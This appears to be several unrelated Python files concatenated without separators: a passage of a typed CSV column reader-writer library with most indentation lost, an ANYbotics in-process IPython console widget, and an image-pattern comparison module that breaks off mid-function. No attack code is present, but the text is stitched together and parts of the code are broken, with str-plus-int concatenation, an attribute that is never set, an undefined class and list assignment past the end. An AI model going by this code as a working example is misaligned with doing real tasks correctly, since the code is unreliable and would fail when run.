self._NamedRow = collections.namedtuple("NamedRow", self.names)
return self._NamedRow
def append(self, columns):
"""
Append the columns of a second instance to the right of the
columns in this instance (self).
Returns a new instance with the additional columns.
A new column must not have the same name as an original
column.
"""
new_instance = self.__class__(self)
for name in columns._column:
if name in self._column:
raise ValueError("Duplicate column name: " + repr(name))
new_instance._column.setdefault(name, columns._column[name])
return new_instance
def changeheadings(self, name_heading_pairs):
"""
Change the headings of selected columns in place.
Returns a new instance with the changed columns, all columns in
original order. Changes can be given in any order.
Parameter 'name_heading_pairs' is a list or other iterator of
string pairs:
("column_name", "new heading")
or
["column_name", "new heading"]
"""
# refuse strings because str is an iterable that we do not handle.
if isinstance(name_heading_pairs, str):
raise ValueError("Changes must be iterable of string pairs: "
+ repr(name_heading_pairs))
new_instance = self.__class__([])
change_dict = dict()
for (name, newhead) in name_heading_pairs:
if not name in self._column:
raise ValueError("Column name does not exist: " + repr(name))
if not isinstance(newhead, str):
raise ValueError("New heading must be str: " + repr(newhead))
change_dict.setdefault(name, newhead)
for (name, v) in self._column.items():
if name in change_dict:
new_instance._column.setdefault(name,
new_instance._ColProperty(
infunc=v.infunc,
outfunc=v.outfunc,
heading=change_dict[name]))
else:
new_instance._column.setdefault(name, v)
return new_instance
def remove(self, names):
"""
Remove a subset of columns.
Returns a new instance with the remaining columns.
Parameter 'names' is a list or other iterator of strings.
Each string must be an existing column name.
"""
if isinstance(names, str):
raise ValueError("names must be an iterator of string")
new_instance = self.__class__(self)
for name in names:
if not name in new_instance._column:
raise ValueError("Heading not present: " + repr(name))
del new_instance._column[name]
return new_instance
def rename(self, name_pairs):
"""
Change the names of selected columns in place.
Returns a new instance with the changed columns, all columns in
original order. Changes can be given in any order.
Parameter 'heading_name_pairs' is a list or other iterator of
string pairs:
("old_name", "new_name")
or
["old_name", "new_name"]
"old_name" must be the name of an existing column,
"new_name" must not duplicate a name to the left of the column
currently being renamed. New name must begin with a letter
continue with letters, digits and underscores, but must not end
with an underscore.
"""
# refuse strings because str is an iterable that we do not handle.
if isinstance(name_pairs, str):
raise ValueError("Changes must be iterable of string pairs: "
+ repr(name_pairs))
new_instance = self.__class__([])
name_dict = dict()
for (oldname, newname) in name_pairs:
if not oldname in self._column:
raise ValueError("Column does not exist: " + repr(oldname))
if not self.isvalidcolumnname(newname):
raise ValueError("New column name is invalid: "
+ repr(newname))
name_dict.setdefault(oldname,newname)
for name in self.names:
if name in name_dict:
newname = name_dict[name]
else:
newname = name
if newname in new_instance._column:
raise ValueError("Duplicate new column name: " + repr(newname))
new_instance._column.setdefault(newname, self._column[name])
return new_instance
def select(self, names):
"""
Create a subset (or a full copy) of columns.
Returns a new instance with the selected columns, in the
same order as the specified names.
Parameter 'names' is a list or other iterator of strings.
Each string must be the name of an existing column and must
appear only once.
"""
if isinstance(names, str):
raise ValueError("names must be an iterator of string")
for name in names:
if not name in self._column:
raise ValueError("Column does not exist: " + repr(name))
new_instance = self.__class__([])
for name in names:
if name in new_instance._column:
raise ValueError("Duplicate name: " + repr(name))
new_instance._column.setdefault(name, self._column[name])
return new_instance
def ListInput(self, rowreader, shortrowsallowed=False, headingpolicy=None):
"""
Create reader instance to input lists of typed values.
Each list will contain itesm in the same order as the columns,
one item for each column. Each item will have the type (like
str or int) that is required for use within the application,
rowreader is an iterable (like csv.reader) that produces an
iterable of strings from each line of text input to the
rowreader
shortrowsallowed specifies whether a row can be shorter than
the number of columns. Missing values are set to None to
produce a row of full length.
headingpolicy is one of:
None (default to self.headingpolicy),
Column.Policy.NO_HEADING,
Column.Policy.HEADING_NO_CHECK,
Column.Policy.HEADING_EASY_CHECK,
Column.Policy.HEADING_EXACT_CHECK
See the module docstring for more info.
When headingpolicy is NO_HEADING, input will commence when the
first data list is requested. Otherwise, the column headings
will be read immediately. If the headings are checked and fail
verification, an exception will be raised immediately.
Otherwise, input will continue when the first data dictionary is
requested.
Usage:
reader = ListInput(rowreader, shortrowsallowed, headingpolicy)
for datalist in reader:
do_something(datalist)
datalist = next(reader)
do_something(datalist)
The number of input lines read (including any headings) will be
available at any time during the life of the reader:
input_lines = reader.line_num
The column headings will be available at any time during the
life of the reader:
input_headings = reader.headingrow
When headingpolicy is NO_HEADING, the headings will be None.
Otherwise, the column headings will be as read from the input,
whether or not those headings match the headings defined for
each column.
"""
return self.__class__._ListInput(self, rowreader, shortrowsallowed,
headingpolicy)
class _ListInput(object):
"""
Reader to input lists of typed values from lists of strings.
"""
def __init__(self, column, rowreader, shortrowsallowed, headingpolicy):
self._headings = [column.heading(name) for name in column.names]
self._infunc = [column._infunc(name) for name in column.names]
self._inputlocation = column._inputlocation
self._rowreader = rowreader
self._re_whitespace = re.compile(r"\s+")
self._line_num = 0
if headingpolicy == None:
self._headingpolicy = column.headingpolicy
else:
if isinstance(headingpolicy, column.Policy):
self._headingpolicy = headingpolicy
else:
raise ValueError("Invalid heading policy: "
+ repr(headingpolicy))
if self._headingpolicy == column.Policy.NO_HEADING:
# finished, first row should be data
self._headingrow = None
return
try:
row = next(self._rowreader)
# It is OK to have no heading when input is empty, but
# any text from first line of input should be headings.
# convert iterable or generator to tuple for multiple use
self._headingrow = tuple(r for r in row)
if self._headingpolicy == column.Policy.HEADING_NO_CHECK:
# first row is headings, but no check required
pass
elif (self._headingpolicy == column.Policy.HEADING_EASY_CHECK
and (self._compressedtuple(h for h in self._headings)
== self._compressedtuple(self._headingrow))):
# first row is headings that match except for whitespace
pass
elif (self._headingpolicy == column.Policy.HEADING_EXACT_CHECK
and (tuple(h for h in self._headings)
== tuple(self._headingrow))):
# first row is headings that match including whitespace
pass
else:
# failed either becuase heading is not correct or because
# headingpolicy is a value that was not included in test
raise ValueError(''.join([
self._inputlocation(self._line_num),
" Error reading headings\nExpected ",
repr([h for h in self._headings]),
"\nReceived ", repr([r for r
in self._headingrow]),
"Heading Policy: ", repr(headingpolicy)])
)
# headings OK, ready for next line which should be data
self._line_num += 1
except StopIteration:
# Defer any action until the attempt to read first row of
# data (second line of text) raises another StopIteration.
pass
def _compresswhitespace(self, text):
"""
Remove extra whitespace from a single string.
Replace all sequences of whitespace by single space, remove
leading and trailing spaces.
"""
return self._re_whitespace.sub(' ', text).strip()
def _compressedtuple(self, items):
"""
Remove extra whitespace from each string in an
iterable of strings, return the results as a tuple.
Replace all sequences of whitespace by single space, remove
leading and trailing spaces.
"""
return tuple(self._compresswhitespace(j) for j in items)
@property
def line_num(self):
"""
This is the number of rows of text that have been read.
It is also the number of the next row waiting to be read,
counting from line 0 as the first line. The count includes
the heading row if there is one, even though the heading row
is not returned.
In CSV text with multiline values, the row coun may be less
than the line count.
"""
return self._line_num
@property
def headingrow(self):
'''
Return headings as read from input.
Returns None if no headings (whenfirst row is data or input is
empty).
The headings may not be the same as the headings in the column
definition/
'''
return self._headingrow
def __iter__(self):
return self
def __next__(self):
"""
Return a line as a list of typed values.
"""
rowvalues = None
try:
row = next(self._rowreader)
data = [r for r in row] # convert iterator or generator to list
if len(data) < len(self._headings):
if self._shortrowsallowed:
for n in range(len(data), len(self._headings)):
data[n] = None
else:
raise ValueError("Expected " + len(self._headings)
+ " items, got " + len(row))
# Convert string values to typed internal values.
rowvalues = [f(d) for f, d in zip(self._infunc, data)]
self._line_num += 1
except SyntaxError as e:
# Syntax error: eval() or ast.literal_eval() from within
# self._infunc(), will be caused by an input string that does
# not parse as a valid Python expression.
raise ValueError(
''.join([self._inputlocation(self._line_num),
" unable to parse incoming text as a Python",
" expression"])
) from e
except Exception as e:
# Any other error can be forwarded with some additional info.
raise RuntimeError(self._inputlocation(self._line_num)
+ " Error reading data."
) from e
return rowvalues
def ListOutput(self, rowwriter, headingpolicy=None):
"""
Create writer instance to output list (or other iterable) of
typed values.
Each list or iterable must have an item for each column, as many
items as there are columns. The items are anononymous, but each
item must be of the type expected by the corresponding column.
Upon output, each item will be converted from the type used by
the application to a string of text.
rowwriter is an object (like cvs.writer) with a writerow method
that accepts an iterator of strings.
headingpolicy is one of:
None (default to self.headingpolicy),
Column.Policy.NO_HEADING,
Column.Policy.HEADING_NO_CHECK,
Column.Policy.HEADING_EASY_CHECK,
Column.Policy.HEADING_EXACT_CHECK
See the module docstring for more info.
When headingpolicy is NO_HEADING, output will commence with the
first data list. Otherwise, the column headings will be written
immediately and output will continue with the first data list.
Usage:
writer = ListOutput(rowreader, headingpolicy)
for datalist in iterable:
writer.write(datalist)
writer.writerows(iterable_of_datalist)
"""
return self.__class__._ListOutput(self, rowwriter, headingpolicy)
class _ListOutput(object):
def __init__(self, column, rowwriter, headingpolicy=None):
self._headings = [column.heading(name) for name in column.names]
self._outfunc = [column._outfunc(name) for name in column.names]
self._outputlocation = column._outputlocation
self._rowwriter = rowwriter
self._line_num = 0 # not intended for external use
# headings not checked on output, so the checked write
# options have the same effect as unchecked write option.
if headingpolicy != column.Policy.NO_HEADING:
try:
self._rowwriter.writerow(self._headings)
self._line_num += 1
except Exception as e:
raise RuntimeError(''.join([
self._outputlocation(self._line_num),
" Error writing column headings."])
) from e
def writerow(self, row):
"""
Write list of values to output, converting to string
as necessary.
"""
try:
# convert iterator or generator to a reusable list, reject str
if isinstance(row, str):
raise ValueError(''.join(["Row data must be list, tuple",
" or other iterable, but not str"]))
data = [r for r in row] # convert iterator or generator to list
if len(data) != len(self._headings):
raise ValueError("Expected " + len(self.headings)
+ " items, got " + len(data))
self._rowwriter.writerow(
[f(d) for (f, d) in zip(self._outfunc, data)])
self._line_num += 1
except Exception as e:
raise RuntimeError(''.join([
self._outputlocation(self._line_num),
" Error writing data."])
) from e
def writerows(self, data):
"""
Output zero or more lists of values as rows of text.
"""
for row in data:
self.writerow(row)
def DictInput(self, rowreader, shortrowsallowed=False, headingpolicy=None):
"""
Create reader instance to input ordered dictionaries of typed
values.
The keys of the items in each dictionary will be the same as the
names of the columns and the items will be in the same order as
the columns. Each item will have the type (like str or int)
that is required for use within the application,
rowreader is an iterable (like csv.reader) that produces an
iterable of strings from each line of text input to the
rowreader
shortrowsallowed specifies whether a row can be shorter than
the number of columns. Missing values are set to None to
produce a row of full length.
headingpolicy is one of:
None (default to self.headingpolicy),
Column.Policy.NO_HEADING,
Column.Policy.HEADING_NO_CHECK,
Column.Policy.HEADING_EASY_CHECK,
Column.Policy.HEADING_EXACT_CHECK
See the module docstring for more info.
When headingpolicy is NO_HEADING, input will commence when the
first data dictionary is requested. Otherwise, the column
headings will be read immediately. If the headings are checked
and fail verification, an exception will be raised immediately.
Otherwise, input will continue when the first data dictionary is
requested.
Usage:
reader = DictInput(rowreader, shortrowsallowed, headingpolicy)
for dictionary in reader:
do_something(dictionary)
dictionary = next(reader)
do_something(dictionary)
The number of input lines read (including any headings) will be
available at any time during the life of the reader:
input_lines = reader.line_num
The column headings will be available at any time during the
life of the reader:
input_headings = reader.headingrow
When headingpolicy is NO_HEADING, the headings will be None.
Otherwise, the column headings will be as read from the input,
whether or not those headings match the headings defined for
each column.
"""
return self.__class__._DictInput(self, rowreader, shortrowsallowed,
headingpolicy)
class _DictInput(object):
def __init__(self, column, rowreader, shortrowsallowed, headingpolicy):
self._names = column.names
self._inputlocation = column._inputlocation
self._listinput = column.ListInput(rowreader, shortrowsallowed,
headingpolicy)
# ListInput will discard headings, so we get line count from
# ListInput instance instead of counting lines in this instance.
self._line_num = self._listinput.line_num
@property
def line_num(self):
"""
This is the number of lines that have been read.
"""
return self._line_num
@property
def headingrow(self):
'''
Return headings as read from input.
Returns None if no headings (whenfirst row is data or input is
empty).
The headings may not be the same as the headings in the column
definition/
'''
return self._listinput.headingrow
def __iter__(self):
return self
def __next__(self):
"""
Return a line as an ordered dictionary of typed values.
"""
row = next(self._listinput) # get row and check length
data = (collections.OrderedDict([(h, r) for h, r
in zip(self._names, row)]))
self._line_num = self._listinput.line_num
return data
def DictOutput(self, rowwriter, headingpolicy=None):
"""
Create writer instance to output dictionaries of typed values.
Each dictionary must have a keyed item for each column. The
key of each item must be the same as the column name of the
corresponding column. Upon output, each item will be converted
from the type used by the application to a string of text.
rowwriter is an object (like cvs.writer) with a writerow method
that accepts an iterator of strings.
headingpolicy is one of:
None (default to self.headingpolicy),
Column.Policy.NO_HEADING,
Column.Policy.HEADING_NO_CHECK,
Column.Policy.HEADING_EASY_CHECK,
Column.Policy.HEADING_EXACT_CHECK
See the module docstring for more info.
When headingpolicy is NO_HEADING, output will commence with the
first data dictionary. Otherwise, the column headings will be
written immediately and output will continue with the first
data dictionary.
Usage:
writer = DictOutput(rowreader, headingpolicy)
for dictionary in iterable:
writer.write(dictionary)
writer.writerows(iterable_of_dictionary)
"""
return self.__class__._DictOutput(self, rowwriter, headingpolicy)
class _DictOutput(object):
def __init__(self, column, rowwriter, hasheadings):
self._names = column.names
self._outputlocation = column._outputlocation
self._listoutput = column.ListOutput(rowwriter, hasheadings)
# ListOutput will write headings, so we get line count from
# ListOutput instance instead of counting lines in this instance.
self._line_num = self._listoutput._line_num
def writerow(self, dictionary):
"""
Write the values for each key of the dictionary to the
corresponding named columns, converting internal values to
strings as necessary.
"""
try:
self._listoutput.writerow(
dictionary[name] for name in self._names)
self._line_num = self._listoutput._line_num
except KeyError as e:
raise ValueError(''.join(
[self._outputlocation(self._line_num),
" dictionary is missing values for one or",
" more columns of output.",
"\nColumn names:\n",
repr(self._names),
"\nDictionary names:\n",
repr(dictionary.keys())
])
) from e
def writerows(self, dictionaryiterator):
"""
Write the values for each key of each dictionary to the
corresponding named columns, converting internal values to
strings as necessary.
"""
for dictionary in dictionaryiterator:
self.writerow(dictionary)
def NamedInput(self, rowreader, shortrowsallowed=False,
headingpolicy=None):
"""
Create a reader instance to input namedtuples of typed values.
The names of the items in each namedtuple will be the same as
names of the columns and the items will be in the same order as
the columns. Each item will have the type (like str or int)
that is required for use within the application,
rowreader is an iterable (like csv.reader) that produces an
iterable of strings from each line of text input to the
rowreader
shortrowsallowed specifies whether a row can be shorter than
the number of columns. Missing values are set to None to
produce a row of full length.
headingpolicy is one of:
None (default to self.headingpolicy),
Column.Policy.NO_HEADING,
Column.Policy.HEADING_NO_CHECK,
Column.Policy.HEADING_EASY_CHECK,
Column.Policy.HEADING_EXACT_CHECK
See the module docstring for more info.
When headingpolicy is NO_HEADING, input will commence when the
first data tuple is requested. Otherwise, the column headings
will be read immediately. If the headings are checked and fail
verification, an exception will be raised immediately.
Otherwise, input will continue when the first data tuple is
requested.
Usage:
reader = NamedInput(rowreader, shortrowsallowed, headingpolicy)
for namedtuple in reader:
do_something(namedtuple)
namedtuple = next(reader)
do_something(namedtuple)
The number of input lines read (including any headings) will be
available at any time during the life of the reader:
input_lines = reader.line_num
The column headings will be available at any time during the
life of the reader:
input_headings = reader.headingrow
When headingpolicy is NO_HEADING, the headings will be None.
Otherwise, the column headings will be as read from the input,
whether or not those headings match the headings defined for
each column.
"""
return self.__class__._NamedInput(self, rowreader, shortrowsallowed,
headingpolicy)
    class _NamedInput(object):
        """
        Reader that yields each input row as a NamedRow namedtuple of
        typed values.

        Not created directly; use Column.NamedInput().
        """
        def __init__(self, column, rowreader, shortrowsallowed, headingpolicy):
            self._inputlocation = column._inputlocation
            self._listinput = column.ListInput(rowreader, shortrowsallowed,
                                               headingpolicy)
            # Namedtuple class object used to build one tuple per row.
            self.NamedRow = column.NamedRow
            # ListInput will discard headings, so we get line count from
            # ListInput instance instead of counting lines in this instance.
            self._line_num = self._listinput.line_num
        @property
        def line_num(self):
            """
            This is the number of lines that have been read.
            """
            return self._line_num
        @property
        def headingrow(self):
            '''
            Return headings as read from input.
            Returns None if no headings (when the first row is data or
            input is empty).
            The headings may not be the same as the headings in the column
            definition.
            '''
            return self._listinput.headingrow
        def __iter__(self):
            return self
        def __next__(self):
            """
            Return a line as a NamedRow namedtuple of typed values.
            """
            row = next(self._listinput)  # get row and check length
            data = self.NamedRow._make(row)
            self._line_num = self._listinput.line_num
            return data
def NamedOutput(self, rowwriter, headingpolicy=None):
"""
Create writer instance to output namwd tuples of typed values.
Each namedtuple must have a named item for each column. The
name of each item must be the same as the column name of the
corresponding column. Upon output, each item will be converted
from the type used by the application to a string of text.
rowwriter is an object (like cvs.writer) with a writerow method
that accepts an iterator of strings.
headingpolicy is one of:
None (default to self.headingpolicy),
Column.Policy.NO_HEADING,
Column.Policy.HEADING_NO_CHECK,
Column.Policy.HEADING_EASY_CHECK,
Column.Policy.HEADING_EXACT_CHECK
See the module docstring for more info.
When headingpolicy is NO_HEADING, output will commence with the
first data tuple. Otherwise, the column headings will be
written immediately and output will continue with the first
data tuple.
Usage:
writer = NamedOutput(rowreader, headingpolicy)
for namedtuple in iterable:
writer.write(namedtuple)
writer.writerows(iterable_of_namedtuple)
"""
return self._NamedOutput(self, rowwriter, headingpolicy)
class _NamedOutput(object):
def __init__(self, column, rowwriter, headingpolicy):
self._names = column.names
self._outputlocation = column._outputlocation
self._listoutput = column.ListOutput(rowwriter, headingpolicy)
# ListOutput will write headings, so we get line count from
# ListOutput instance instead of counting lines in this instance.
self._line_num = self._listoutput._line_num
def writerow(self, namedtuple):
"""
Write the named items of the tuple to the corresponding
named columns, converting internal values to strings as
necessary.
"""
rowdictionary = namedtuple._asdict()
try:
self._listoutput.writerow(
rowdictionary[name] for name in self._names)
self._line_num = self._listoutput._line_num
except KeyError as e:
raise ValueError(''.join([
self._outputlocation(self._line_num),
" namedtuple is missing values for one or",
" more column names.",
"\nColumn names:\n",
repr(self._names),
"\ntuple names:\n",
repr(rowdictionary.keys())
]) ) from e
def writerows(self, namedtupleiterator):
"""
Write the named items of each tuple to the corresponding
named columns, converting internal values to strings as
necessary.
"""
for namedtuple in namedtupleiterator:
self.writerow(namedtuple)
class Delim(object):
    """
    Factory producing reader and writer objects for non-CSV delimited text.

    Delim.reader() behaves similarly to csv.reader():
        It returns an iterator that splits each string yielded by the
        source iterable into a list of fields.  Trailing line-ends are
        stripped before splitting.  The iterator exposes a line_num
        attribute counting the strings consumed.

    Delim.writer() behaves similarly to csv.writer():
        It returns an object whose writerow() method joins an iterable
        of values with the delimiter and writes one line per row to a
        destination object that has a write() method.

    Usage:
        reader = Delim(delimiter).reader(line_iterator)
        for row in reader:
            do_something(row)
        number_of_lines_read = reader.line_num

        writer = Delim(delimiter).writer(textwriter)
        writer.writerow(iterable_of_str)
        writer.writerows(iterable_of_iterable_of_str)
    """

    def __init__(self, delimiter):
        """
        Initialize a factory for delimited reader and writer objects.

        delimiter is a string of one or more characters used as a field
        separator.  A zero-length string means "no delimiter" (each
        whole line is a single field on input).  None is special: any
        run of whitespace separates input fields, and a single space
        joins output fields.
        """
        # Input follows str.split(delimiter) semantics exactly.
        self.delimread = delimiter
        # For output, both None and '' fall back to a single space,
        # since join() needs a concrete separator.
        self.delimwrite = delimiter if delimiter else ' '

    def reader(self, textreader):
        """
        Create a reader that splits text lines into lists of str.

        textreader is an iterable yielding one string per iteration;
        trailing line-end characters are ignored.
        """
        return self._reader(textreader, self.delimread)

    class _reader(object):
        """
        Reader similar to csv.reader, but for plain delimited text.
        """

        def __init__(self, textreader, delim):
            self.textreader = textreader
            self.delim = delim
            self._line_num = 0

        def __iter__(self):
            return self

        def __next__(self):
            """
            Return the next line as a list of str, counting lines read.
            """
            fields = next(self.textreader).rstrip("\n\r").split(self.delim)
            self._line_num += 1
            return fields

        @property
        def line_num(self):
            """
            Number of lines read so far.
            """
            return self._line_num

    def writer(self, textwriter):
        """
        Create a writer that joins each row of values with the
        delimiter and writes the result as one line.

        textwriter is an object with a write() method accepting a
        single string per invocation.
        """
        return self._writer(textwriter, self.delimwrite)

    class _writer(object):
        """
        Writer similar to csv.writer, but for plain delimited text.
        """

        def __init__(self, textwriter, delim):
            self.textwriter = textwriter
            self.delim = delim

        def writerow(self, row):
            # Values are coerced to str so numeric items are accepted.
            pieces = [str(field) for field in row]
            self.textwriter.write(self.delim.join(pieces) + "\n")

        def writerows(self, rows):
            for row in rows:
                self.writerow(row)
if __name__ == "__main__":
    """Run as a script when invoked from shell command line."""
    # This module is import-only; running it directly is an explicit error.
    raise NotImplementedError("'" + sys.argv[0]
        + "' does not currently run as a standalone script")
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 ANYbotics AG
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import numpy
from PySide2 import QtWidgets
from qtconsole.inprocess import QtInProcessKernelManager
from qtconsole.rich_jupyter_widget import RichJupyterWidget
class ConsoleWidget(RichJupyterWidget):
    """In-process IPython console widget for the plotting UI.

    The widget owns an in-process Jupyter kernel whose user namespace is
    seeded with plotting helpers (``plot``, ``clf``, ``EulerAngles``),
    ``pi``, and the ``silo``/``ui`` objects passed to :meth:`start`.
    """

    def __init__(self, *args, **kwargs):
        super(ConsoleWidget, self).__init__(*args, **kwargs)
        # Both are created lazily by start(); None until then.
        self.kernel_client = None
        self.kernel_manager = None

    def start(self, silo, ui):
        """Start the kernel manager and client and wire up the widget.

        :param silo: signal data store pushed into the kernel namespace
        :param ui: main UI object used by the plotting helpers
        """
        self.start_kernel_manager(silo, ui)
        self.start_kernel_client()
        self.exit_requested.connect(QtWidgets.QApplication.quit)
        self.clear()

    def start_kernel_manager(self, silo, ui):
        """Create the in-process kernel and seed its user namespace."""
        kernel_manager = QtInProcessKernelManager()
        kernel_manager.start_kernel(show_banner=False)
        kernel_manager.kernel.gui = 'qt'

        def EulerAngles(name, roll, pitch, yaw, *args, **kwargs):
            # Convenience constructor for constant Euler-angle signals.
            from signal_logger.rotation_signals import EulerAnglesZyxSignal
            return EulerAnglesZyxSignal.from_constant(
                name, silo.times, roll, pitch, yaw, *args, **kwargs)

        def clf():
            # Clear the current pylab figure and redraw the embedded canvas.
            import pylab
            pylab.clf()
            ui.tab.ui.canvas.canvas.draw()

        def plot(signal, *args, **kwargs):
            # TODO(scaron): currently plots to the right axis, give choice
            signal.plot(*args, **kwargs)
            ui.tab.ui.canvas.canvas.draw()

        kernel_manager.kernel.shell.push({
            'EulerAngles': EulerAngles,
            'clf': clf,
            'plot': plot,
            'pi': numpy.pi,
            'silo': silo,
            'ui': ui,
        })
        self.kernel_manager = kernel_manager

    def start_kernel_client(self):
        """Create and start the channels of the kernel's client."""
        # BUG FIX: this previously read `self._kernel_manager`, but the
        # class only ever assigns `self.kernel_manager` (see __init__ and
        # start_kernel_manager), so the public attribute is used here.
        kernel_client = self.kernel_manager.client()
        kernel_client.start_channels()
        self.kernel_client = kernel_client

    def clear(self):
        """Clear the IPython console."""
        self._control.clear()

    def execute_command(self, command):
        """Execute a command in the frame of the console widget."""
        self._execute(command, False)

    def print_text(self, text):
        """Print some plain text to the IPython console."""
        self._append_plain_text(text)
|
'''
comp_slice_ is a terminal fork of intra_blob.
It traces blob axis by cross-comparing vertically adjacent Ps: horizontal slices across an edge blob.
These high-G high-Ma blobs are vectorized into outlines of adjacent flat or low-G blobs.
Vectorization is clustering of Ps + derivatives into PPs: patterns of Ps that describe an edge.
Double edge lines: assumed match between edges of high-deviation intensity, no need for cross-comp?
secondary cross-comp of low-deviation blobs? P comb -> intra | inter comp eval?
radial comp extension for co-internal blobs:
!= sign comp x sum( adj_blob_) -> intra_comp value, isolation value, cross-sign merge if weak, else:
== sign comp x ind( adj_adj_blob_) -> same-sign merge | composition:
borrow = adj_G * rA: default sum div_comp S -> relative area and distance to adjj_blob_
internal sum comp if mA: in thin lines only? comp_norm_G or div_comp_G -> rG?
isolation = decay + contrast:
G - G * (rA * ave_rG: decay) - (rA * adj_G: contrast, = lend | borrow, no need to compare vG?)
if isolation: cross adjj_blob composition eval,
else: cross adjj_blob merge eval:
blob merger if internal match (~raG) - isolation, rdn external match:
blob compos if external match (~rA?) + isolation,
Also eval comp_slice over fork_?
rng+ should preserve resolution: rng+_dert_ is dert layers,
rng_sum-> rng+, der+: whole rng, rng_incr-> angle / past vs next g,
rdn Rng | rng_ eval at rng term, Rng -= lost coord bits mag, always > discr?
'''
from time import time
from collections import deque
from class_cluster import ClusterStructure, NoneType
from math import hypot
import numpy as np
import warnings # to detect overflow issue, in case of infinity loop
warnings.filterwarnings('error')
# Filters (thresholds) for evaluation; tuned empirically:
ave = 20        # general comparison filter, e.g. mp > ave * 7 in form_par_P
div_ave = 200   # filter for div_comp eval — see eval_div notes below
flip_ave = 1000  # axis-flip filter; not referenced in this chunk — TODO confirm use
ave_dX = 10  # difference between median x coords of consecutive Ps
class Cdert_P(ClusterStructure):
    # Result of comparing two vertically adjacent Ps (see comp_slice).
    # Right-hand sides are ClusterStructure type declarations, not values.
    Pi = object  # P instance, accumulation: Cdert_P.Pi.I += 1, etc.
    Pm = int   # summed match of compared params (mX + mL + ... in comp_slice)
    Pd = int   # summed difference of compared params
    mx = int   # x-overlap match
    dx = int   # x-offset difference
    mL = int   # length match
    dL = int   # length difference
    mDx = int  # |Dx| match
    dDx = int  # |Dx| difference
    mDy = int  # Dy match
    dDy = int  # Dy difference
    mDg = int  # g-dert Dg match
    dDg = int  # g-dert Dg difference
    mMg = int  # g-dert Mg match
    dMg = int  # g-dert Mg difference
    sstack = object  # back-reference to the CSstack this dert_P was packed into
class CPP(ClusterStructure):
    # Pattern of Ps: a cluster of same-Pm-sign dert_Ps spanning one or
    # more sstacks (see stack_2_PP_ / upconnect_2_PP_).
    stack_ = list    # source stacks covered by this PP
    sstack_ = list   # member CSstacks
    sstacki = object  # summary sstack holding accumulated dert_P params
    # between PPs:
    upconnect_ = list
    in_upconnect_cnt = int  # tentative upconnect count before getting the confirmed upconnect
    downconnect_cnt = int
    fPPm = NoneType  # PPm if 1, else PPd; not needed if packed in PP_?
    fdiv = NoneType
class CSstack(ClusterStructure):
    # an element of sstack in PP: a sign-confirmed run of dert_Ps
    upconnect_ = list
    upconnect_cnt = int
    downconnect_cnt = int
    # + other params of CStack?
    Py_ = list        # vertical sequence of member dert_Ps
    dert_Pi = object  # accumulated dert_P params of this sstack (see accum_sstack)
    fdiv = NoneType
    ## PP
    PP = object  # owning CPP
    PP_id = int  # id of owning CPP (assigned in accum_PP)
    # sstack params = accumulated dert_P params:
    # sPM, sPD, sMX, sDX, sML, sDL, sMDx, sDDx, sMDy, sDDy, sMDg, sDDg, sMMg, sDMg
# add to blob:
# PPm_ = list
# PPd_ = list # these are now primary blob-level structures
# derP__ = [np.flipud(dert_) for dert_ in dert__] # flip dert__ upside down
def comp_slice_(stack_, _P):
    '''
    cross-compare connected Ps of stack_, including Ps of adjacent stacks (upconnects)

    Walks each unchecked stack bottom-up, compares consecutive Ps with
    comp_slice, and REPLACES stack.Py_ in place with the resulting
    dert_P list.  Recurses into upconnects carrying the last compared P.
    '''
    for stack in reversed(stack_):  # bottom-up
        if not stack.f_checked :  # else this stack has been scanned as some other upconnect
            stack.f_checked = 1
            DdX = 0  # accumulate across stacks?
            dert_Py_ = []
            if not _P:  # stack is from blob.stack_
                _P = stack.Py_.pop()
                dert_Py_.append(Cdert_P(Pi=_P))  # _P only, no derivatives in 1st dert_P
            for P in reversed(stack.Py_):
                dert_P = comp_slice(P, _P, DdX)  # ortho and other conditional operations are evaluated per PP
                dert_Py_.append(dert_P)  # dert_P is converted to Cdert_P in comp_slice
                _P = P
            stack.Py_ = dert_Py_  # NOTE: Py_ now holds dert_Ps, not Ps
            if stack.upconnect_:
                comp_slice_(stack.upconnect_, _P)  # recursive compare _P to all upconnected Ps
def comp_slice_converting(stack_, _derP, _P):
    '''
    cross-compare connected Ps of stack_, including Ps of adjacent stacks (upconnects)

    NOTE(review): this variant looks legacy / in transition:
    - CderP is not defined in this module (only Cdert_P is) — verify import.
    - The recursive call below invokes comp_slice_ (2 params) with 3 args
      and concatenates its None return; it probably should call
      comp_slice_converting — TODO confirm.
    '''
    derP_ = []
    DdX = 0
    for stack in reversed(stack_):  # bottom-up
        if not stack.f_checked :  # else this stack has been scanned as some other upconnect
            stack.f_checked = 1
            downconnect_ = stack.downconnect_cnt
            if not _P:  # stack is from blob.stack_
                _P = stack.Py_.pop()
                _derP = CderP(Pi=_P, downconnect_ = downconnect_, stack = stack)
                derP_.append(_derP)  # no derivatives in 1st derP, assign stack.downconnect_cnt to derP.downconnect_
            for P in reversed(stack.Py_):
                derP = comp_slice(P, _P, DdX)  # ortho and other conditional operations are evaluated per PP
                for downconnect in P.downconnect_:  # assign current derP as downconnect' upconnect:
                    if downconnect is not _derP:
                        downconnect.upconnect_.append(derP)
                _derP.upconnect_.append(derP)  # next
                derP.downconnect_ = downconnect_
